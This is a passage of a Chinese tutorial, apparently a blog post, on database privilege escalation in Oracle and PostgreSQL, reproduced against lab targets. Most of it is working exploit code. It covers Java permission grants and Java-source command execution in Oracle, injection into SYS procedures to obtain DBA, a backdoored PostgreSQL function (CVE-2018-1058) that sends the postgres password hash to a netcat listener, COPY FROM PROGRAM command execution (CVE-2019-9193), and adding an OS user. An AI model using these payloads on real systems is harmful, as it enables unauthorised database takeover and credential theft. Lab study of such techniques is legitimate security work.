               exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;
               exec sp_configure 'show advanced options',0;reconfigure;
              ```

Oracle提权

靶场搭建

  1. 准备一个oracle环境的靶场

  2. 进入数据库sqlplus/nolog

  3. 连接数据库用户conn/as sysdba

  4. 创建一个低权限用户create user test identified by test;

  5. 还有获得有java权限

    php 复制代码
     DECLARE
    
         POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    
         CURSOR C1 IS SELECT 'GRANT', 'ZTZ', 'SYS', 'java.io.FilePermission', '<<ALL
    
      FILES>>', 'execute', 'ENABLED' FROM DUAL;
    
         BEGIN
    
         OPEN C1;
    
         FETCH C1 BULK COLLECT INTO POL;
    
         CLOSE C1;
    
         DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
    
         END;
    
        /
  6. 如果想要执行任意代码的话还需要额外获得java.lang.RuntimePermission权限

    php 复制代码
     DECLARE
    
         POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    
         CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission',
    
     'writeFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;
    
         BEGIN
    
         OPEN C1;
    
         FETCH C1 BULK COLLECT INTO POL;
    
         CLOSE C1;
    
         DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
    
         END;
    
        /
    
      DECLARE
    
         POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    
         CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission',
    
     'readFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;
    
         BEGIN
    
         OPEN C1;
    
         FETCH C1 BULK COLLECT INTO POL;
    
         CLOSE C1;
    
         DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
    
         END;
    
        /

执行任意命令

  ###### 复现

  1. 创建java包

     1. `select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;`
  2. 获取java权限

     1. `select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<all>'''',''''EXECUTE'''');end;''commit;end;') from dual;`
  3. 创建执行命令函数

     1.

        ```php
         select dbms_xmlquery.newcontext('declar
         e PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
        ```

  4. 执行命令`select LinxRUNCMD('whoami') from dual;`

通过注入存储过程提权(低权限提升至DBA)

  ###### 原理

  1. SYS创建的存储过程存在sql注入。拥有`create procedure`权限的用户通过创建提权函数,将提权函数注入到存储过程中,于是该存储过程将调用这个提权函数来执行`grant dba to quan`命令,获得**Oracle数据库dba权限**。
  ###### 利用条件

  1. SYS创建的存储过程`存在sql注入`(EG:CVE-2005-4832)
  2. 用户拥有`create procedure`权限(用来创建函数)
  ###### 复现

  1. 创建一个java class然后用procedure包装进行调用

     1.

        ```php
         create or replace and resolve java source named JAVACMD as

             import java.lang.*;

             import java.io.*;

             public class JAVACMD

             {

                public static void execmd(String command) throws IOException

                {

                        Runtime.getRuntime().exec(command);

                }

            }

            /
        ```

  2. 创建调用的包

     1.

        ```php
         create or replace procedure MYJAVACMD(command in varchar) as language java



             name 'JAVACMD.execmd(java.lang.String)';

         /
        ```

  3. 执行命令

     1.

        ```php
         EXEC MYJAVACMD('net user cong cong /add');
        ```

  4. ![image](https://img-blog.csdnimg.cn/img_convert/d373697e625de19f0a6a782b5ffd6dd5.png)

PostgreSQl提权

介绍

  1. PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。

复现

  ###### 创建函数提权

  1. 介绍

     1. PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作
  2. 靶场:vulhub postgres/CVE-2018-1058

  3. 用普通用户连接数据库,`psql --host 192.168.72.130 --username vulhub`(vulhub/vulhub)

  4. 执行以下语句即可(注意更换监听ip与端口)

     1.

        ```php
         CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
             select dblink_connect((select 'hostaddr=192.168.1.7 port=1234 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
             SELECT pg_catalog.array_to_string($1,$2);
         $$ LANGUAGE SQL VOLATILE;
        ```

  5. 监听端口`nc -lvvp 1234`

  6. 模仿超级管理员使用ps_dump命令:`docker_compose exec postgres pg_dump -U postgres -f evil.bak vulhub`,后门被触发

     1. ![image](https://img-blog.csdnimg.cn/img_convert/a40f8ec5e38a5618ce40b50419854453.png)
  ###### 高权限提权

  1.

     ###### 介绍

     1. PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个"COPY TO/FROM PROGRAM"功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令
  2.

     ###### 影响版本

     1. 9.3-11.2
  3.

     ###### 复现

     1. 靶场:vulfocus postgresql 命令执行 (cve-2019-9193)123.58.224.8:31404 31404:5432

     2. 连接postgres/postgres数据库

     3. 删除一个可能存在的函数`DROP TABLE IF EXISTS cmd_exec`

        1. ![image](https://img-blog.csdnimg.cn/img_convert/3ead04866bc693389745ebe727913669.png)
     4. 创建执行命令`CREATE TABLE cmd_exec(cmd_output text);`

        1. ![image](https://img-blog.csdnimg.cn/img_convert/207d2173b65ba9151b7fe3dc8692cdac.png)
     5. 执行系统命令`COPY cmd_exec FROM PROGRAM 'whoami'`

        1. ![image](https://img-blog.csdnimg.cn/img_convert/2bc1a1bc5113efb42079ab2538b93585.png)
     6. 将结果显示出来`SELECT * FROM cmd_exec`

        1. ![image](https://img-blog.csdnimg.cn/img_convert/d991d8e1e4d60c30ecafc97ac8330b51.png)

相关推荐
远歌已逝2 小时前
维护在线重做日志(二)
数据库·oracle
qq_433099403 小时前
Ubuntu20.04从零安装IsaacSim/IsaacLab
数据库
Dlwyz3 小时前
redis-击穿、穿透、雪崩
数据库·redis·缓存
工业甲酰苯胺5 小时前
Redis性能优化的18招
数据库·redis·性能优化
冰帝海岸5 小时前
01-spring security认证笔记
java·笔记·spring
没书读了6 小时前
ssm框架-spring-spring声明式事务
java·数据库·spring
小二·6 小时前
java基础面试题笔记(基础篇)
java·笔记·python
i道i6 小时前
MySQL win安装 和 pymysql使用示例
数据库·mysql
小怪兽ysl6 小时前
【PostgreSQL使用pg_filedump工具解析数据文件以恢复数据】
数据库·postgresql
wqq_9922502777 小时前
springboot基于微信小程序的食堂预约点餐系统
数据库·微信小程序·小程序